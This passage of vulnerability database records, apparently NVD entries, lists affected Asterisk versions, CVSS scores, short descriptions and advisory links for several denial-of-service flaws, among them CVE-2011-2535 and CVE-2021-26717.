              "criteria": "cpe:2.3:a:digium:asterisk:1.4.36:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "87FDE2E2-5F08-43EF-BBD8-7DCCC0C98870",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:*:*:*:*:*:*:*",
              "matchCriteriaId": "347E9D8C-A372-41F2-AB48-FFCAB454C9C8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.37:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "74F67E57-1DD0-4850-8D7E-7A9748BD106C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:*:*:*:*:*:*:*",
              "matchCriteriaId": "B208C056-B567-4BEE-A9B7-AEB394341D5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.38:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "A0C3A2D4-07A9-4D28-AC18-03523E9FF34A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6516E0F-9F60-4D20-88D3-B9CD8DC93062",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "22147B91-45A4-4834-AC8D-2DC17A706BEF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "677C10DE-46D8-4EF1-BF22-63F3AE37CBC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.39.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "E299CE20-B02D-4519-AC46-BB64B1E3826A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:*:*:*:*:*:*:*",
              "matchCriteriaId": "22FD16C3-7518-4208-8C0A-043C13C14A72",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "2461B6B9-2C93-4D84-A1EE-C07AD32A9540",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "C8A4CE2D-FBAB-4C35-846A-5B95BBCAD6BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "30FFB6F4-1BC7-4D4C-9C65-A66CF514E321",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "F745AF0A-D6A6-4429-BBBE-347BF41999BF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.40.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "DC44F61B-AB96-4643-899B-19B9E3B4F05C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.41:*:*:*:*:*:*:*",
              "matchCriteriaId": "F788A255-CF21-424F-9F30-8A744CC16740",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:1.4.41:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "92B8AA8E-D49B-4AD7-8AFC-BD4F9E9C7A16",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "78E8936C-033B-49E6-BB39-D5BBBC80EB55",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.1.0:-:business:*:*:*:*:*",
              "matchCriteriaId": "5D05D04F-CD6C-4A73-885C-306D7A5CC7C4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.1.1:-:business:*:*:*:*:*",
              "matchCriteriaId": "3805B5F3-A4CD-469F-9F8A-A271A79A2B7C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.2.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "9FAEBE5E-378A-40DC-B2B9-31F6D1305BCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.2.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "617B3FE8-39E3-41C0-9348-9507DA43DE93",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.3.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "04AB4C82-71BB-49B7-B4F3-4E75EFB5F1A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.2:-:business:*:*:*:*:*",
              "matchCriteriaId": "78B55176-E269-411B-974A-B5D2CE8E08C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.3:-:business:*:*:*:*:*",
              "matchCriteriaId": "9BCF12B0-4B8D-499D-B5DE-FB0CD9EEC3B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:c.3.6.4:-:business:*:*:*:*:*",
              "matchCriteriaId": "9ED68059-F0E5-4B1B-B633-466D92F38346",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "chan_iax2.c in the IAX2 channel driver in Asterisk Open Source 1.4.x before 1.4.41.1, 1.6.2.x before 1.6.2.18.1, and 1.8.x before 1.8.4.3, and Asterisk Business Edition C.3 before C.3.7.3, accesses a memory address contained in an option control frame, which allows remote attackers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a crafted frame."
    },
    {
      "lang": "es",
      "value": "chan_iax2.c en el controlador de canal IAX2 en Asterisk Open Source v1.4.x anteriores a v1.4.41.1, v1.6.2.x anteriores a v1.6.2.18.1, y v1.8.x anteriores a v1.8.4.3, y Asterisk Business Edition vC.3 anteriores a vC.3.7.3, accede a una direcci\u00f3n de memoria contenida en un marco de control de opci\u00f3n, que permite a atacantes remotos causar una denegaci\u00f3n de servicio (ca\u00edda del demonio) o posiblemente tener un impacto no especificado a trav\u00e9s de un marco manipulado."
    }
  ],
  "id": "CVE-2011-2535",
  "lastModified": "2024-11-21T01:28:29.320",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2011-07-06T19:55:03.497",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-010-1.8.diff"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-010.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/44973"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/45048"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/45201"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://secunia.com/advisories/45239"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://securitytracker.com/id?1025708"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2011/dsa-2276"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/73309"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.securityfocus.com/bid/48431"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68205"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-010-1.8.diff"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2011-010.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062628.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/44973"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://secunia.com/advisories/45048"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/45201"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://secunia.com/advisories/45239"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://securitytracker.com/id?1025708"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2011/dsa-2276"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/73309"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.securityfocus.com/bid/48431"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/68205"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-20"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2021-02-18 20:15

Modified

2024-11-21 05:56

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

An issue was discovered in Sangoma Asterisk 16.x before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6. When re-negotiating for T.38, if the initial remote response was delayed just enough, Asterisk would send both audio and T.38 in the SDP. If this happened, and the remote responded with a declined T.38 stream, then Asterisk would crash.

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/161471/Asterisk-Project-Security-Advisory-AST-2021-002.html	Third Party Advisory
cve@mitre.org	http://seclists.org/fulldisclosure/2021/Feb/58	Mailing List, Patch, Third Party Advisory
cve@mitre.org	https://downloads.asterisk.org/pub/security/	Vendor Advisory
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2021-002.html	Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-29203	Issue Tracking, Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/161471/Asterisk-Project-Security-Advisory-AST-2021-002.html	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2021/Feb/58	Mailing List, Patch, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2021-002.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-29203	Issue Tracking, Patch, Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "7382B641-0396-456F-BF33-3F6412E35F2D",
              "versionEndExcluding": "16.16.1",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C5BA8606-ADA9-4841-A7E2-A9165138849A",
              "versionEndExcluding": "17.9.2",
              "versionStartIncluding": "17.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F10CB148-DF9C-4134-A417-3B111C036E20",
              "versionEndExcluding": "18.2.1",
              "versionStartIncluding": "18.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:-:*:*:*:*:*:*",
              "matchCriteriaId": "81C3E390-8B99-4EB8-82DD-02893611209A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "17DB2297-1908-4F87-8046-2BAA74569D71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CEA2CC40-C2F6-4828-82F0-1B50D3E61F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32F19F43-C1E8-4B6C-9356-AF355B7320BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "21D1FA32-B441-485F-8AE9-F3A394626909",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F7795CCF-B160-4B4F-9529-1192C11D7FDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "0C5E5D0D-9EB3-40FD-8B7E-E93A95D07AB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "C7DFDA30-DD61-4BBC-AFE4-448BF2A4F303",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "142F1F89-49AC-4A0B-A273-61F697063A5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "53041795-788C-4914-A2F6-41539ABE0244",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FBB98E65-B2D0-49A4-8BF3-12155E3E13C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "769C854C-03CD-40A9-B39B-C0CDCA8252EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "6D86AD6E-4E07-48B0-88D8-E18F277FFE6A",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "An issue was discovered in Sangoma Asterisk 16.x before 16.16.1, 17.x before 17.9.2, and 18.x before 18.2.1 and Certified Asterisk before 16.8-cert6. When re-negotiating for T.38, if the initial remote response was delayed just enough, Asterisk would send both audio and T.38 in the SDP. If this happened, and the remote responded with a declined T.38 stream, then Asterisk would crash."
    },
    {
      "lang": "es",
      "value": "Se detect\u00f3 un problema en Sangoma Asterisk versiones 16.x anteriores a 16.16.1, versiones 17.x anteriores a 17.9.2 y versiones 18.x anteriores a 18.2.1 y Certified Asterisk versiones anteriores a  16.8-cert6.\u0026#xa0;Al renegociar para T.38, si la respuesta remota inicial se retras\u00f3 lo suficiente, Asterisk enviar\u00eda tanto audio como T.38 en el SDP.\u0026#xa0;Si esto sucediera, y el control remoto respondiera con una transmisi\u00f3n T.38 rechazada, entonces Asterisk podr\u00eda bloquearse"
    }
  ],
  "id": "CVE-2021-26717",
  "lastModified": "2024-11-21T05:56:44.287",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-02-18T20:15:12.667",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://packetstormsecurity.com/files/161471/Asterisk-Project-Security-Advisory-AST-2021-002.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Feb/58"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-002.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29203"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://packetstormsecurity.com/files/161471/Asterisk-Project-Security-Advisory-AST-2021-002.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Patch",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Feb/58"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-002.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29203"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-noinfo"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2016-02-22 15:59

Modified

2024-11-21 02:48

Severity ?

5.9 (Medium) - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

chan_sip in Asterisk Open Source 1.8.x, 11.x before 11.21.1, 12.x, and 13.x before 13.7.1 and Certified Asterisk 1.8.28, 11.6 before 11.6-cert12, and 13.1 before 13.1-cert3, when the timert1 sip.conf configuration is set to a value greater than 1245, allows remote attackers to cause a denial of service (file descriptor consumption) via vectors related to large retransmit timeout values.

References

URL	Tags
cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2016-002.html	Exploit, Patch, Vendor Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177409.html	Third Party Advisory
cve@mitre.org	http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177422.html	Third Party Advisory
cve@mitre.org	http://www.debian.org/security/2016/dsa-3700
cve@mitre.org	http://www.securityfocus.com/bid/82651	Third Party Advisory, VDB Entry
cve@mitre.org	http://www.securitytracker.com/id/1034930	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2016-002.html	Exploit, Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177409.html	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177422.html	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2016/dsa-3700
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/82651	Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	http://www.securitytracker.com/id/1034930	Third Party Advisory, VDB Entry

Impacted products

Vendor	Product	Version
fedoraproject	fedora	22
fedoraproject	fedora	23
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.0
digium	asterisk	1.8.1
digium	asterisk	1.8.1
digium	asterisk	1.8.1.1
digium	asterisk	1.8.1.2
digium	asterisk	1.8.2
digium	asterisk	1.8.2.1
digium	asterisk	1.8.2.2
digium	asterisk	1.8.2.3
digium	asterisk	1.8.2.4
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3
digium	asterisk	1.8.3.1
digium	asterisk	1.8.3.2
digium	asterisk	1.8.3.3
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4
digium	asterisk	1.8.4.1
digium	asterisk	1.8.4.2
digium	asterisk	1.8.4.3
digium	asterisk	1.8.4.4
digium	asterisk	1.8.5
digium	asterisk	1.8.5
digium	asterisk	1.8.5.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.6.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.0
digium	asterisk	1.8.7.1
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.0
digium	asterisk	1.8.8.1
digium	asterisk	1.8.8.2
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.0
digium	asterisk	1.8.9.1
digium	asterisk	1.8.9.2
digium	asterisk	1.8.9.3
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.0
digium	asterisk	1.8.10.1
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.0
digium	asterisk	1.8.11.1
digium	asterisk	1.8.11.1
digium	asterisk	1.8.11.1
digium	asterisk	1.8.12
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.0
digium	asterisk	1.8.12.1
digium	asterisk	1.8.12.2
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.0
digium	asterisk	1.8.13.1
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.0
digium	asterisk	1.8.14.1
digium	asterisk	1.8.14.1
digium	asterisk	1.8.14.1
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.0
digium	asterisk	1.8.15.1
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.16.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.17.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.0
digium	asterisk	1.8.18.1
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.0
digium	asterisk	1.8.19.1
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.0
digium	asterisk	1.8.20.1
digium	asterisk	1.8.20.1
digium	asterisk	1.8.20.2
digium	asterisk	1.8.20.2
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.21.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.22.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.0
digium	asterisk	1.8.23.1
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.0
digium	asterisk	1.8.24.1
digium	asterisk	1.8.25.0
digium	asterisk	1.8.25.0
digium	asterisk	1.8.25.0
digium	asterisk	1.8.26.0
digium	asterisk	1.8.26.0
digium	asterisk	1.8.26.1
digium	asterisk	1.8.27.0
digium	asterisk	1.8.27.0
digium	asterisk	1.8.27.0
digium	asterisk	1.8.28.0
digium	asterisk	1.8.28.0
digium	asterisk	1.8.28.1
digium	asterisk	1.8.28.2
digium	asterisk	1.8.32.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.0
digium	asterisk	11.0.1
digium	asterisk	11.0.2
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.0
digium	asterisk	11.1.1
digium	asterisk	11.1.2
digium	asterisk	11.2.0
digium	asterisk	11.4.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.6.0
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.7.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.0
digium	asterisk	11.8.1
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.9.0
digium	asterisk	11.10.0
digium	asterisk	11.10.0
digium	asterisk	11.10.1
digium	asterisk	11.10.1
digium	asterisk	11.11.0
digium	asterisk	11.11.0
digium	asterisk	11.12.0
digium	asterisk	11.12.0
digium	asterisk	11.13.0
digium	asterisk	11.13.0
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	11.14.0
digium	asterisk	11.15.0
digium	asterisk	11.15.0
digium	asterisk	11.15.0
digium	asterisk	11.16.0
digium	asterisk	11.16.0
digium	asterisk	11.17.0
digium	asterisk	11.18.0
digium	asterisk	11.18.0
digium	asterisk	11.19.0
digium	asterisk	11.20.0
digium	asterisk	11.21.0
digium	asterisk	11.21.0
digium	asterisk	11.21.0
digium	asterisk	11.21.0
digium	asterisk	12.0.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.0
digium	asterisk	12.1.1
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.2.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.0
digium	asterisk	12.3.1
digium	asterisk	12.3.2
